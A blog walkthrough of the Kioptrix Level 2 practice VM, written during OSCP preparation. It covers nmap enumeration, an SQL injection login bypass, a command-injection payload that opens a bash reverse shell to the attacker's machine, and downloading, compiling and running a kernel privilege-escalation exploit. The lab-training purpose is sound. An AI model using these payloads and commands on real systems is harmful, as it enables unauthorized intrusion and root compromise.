Kioptrix: Level 2

I have 24 more days to prepare for OSCP.


Enumeration

I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0

 

I ran NMAP to check for open ports and running services.

nmap -p- -sV -sS -T4 -A -oX Kioptrixlvl2.xml 192.168.33.134

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-17 06:53 EDT
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 71.43% done; ETC: 06:53 (0:00:04 remaining)
Nmap scan report for 192.168.33.134
Host is up (0.00049s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 629/udp status
|_ 100024 1 632/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2017-05-17T07:44:20+00:00; -3h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
632/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:83:E9:87 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 – 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m39s, deviation: 0s, median: -3h09m39s

TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.33.134

Post-scan script results:
| clock-skew:
|_ -3h09m39s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.10 seconds


Exploitation

The content of Apache HTTPD port 80 is a login page that can be bypassed using SQLi.

 After I bypassed the login page, I was redirected to a page with ping function. Then, I checked if the page is vulnerable to remote code execution.


Getting the result of ifconfig, I confirmed that the application is vulnerable to command injection.

Next, I setup a netcat listener.

nc -nlvp 4444

Then, I used this command to connect back to our attacking machine.

192.168.33.129;bash -i >& /dev/tcp/192.168.33.129/4444 0>&1

After I clicked on the submit button the target machine connected to my attacking machine.

I googled “2.6.9-55 el exploit” and found this exploit.

“Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)”

https://www.exploit-db.com/exploits/9542/

I downloaded the exploit in /tmp folder using our victim machine.

wget -O exploit.c https://www.exploit-db.com/download/9542

I encountered a certificate problem so I used this command instead.
wget -O exploit.c –no-check-certificate https://www.exploit-db.com/download/9542

I compiled the exploit.c.
gcc exploit.c -o exploit

I ran it.
./exploit

 

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

Check this * Time limit is exhausted. Please reload the CAPTCHA.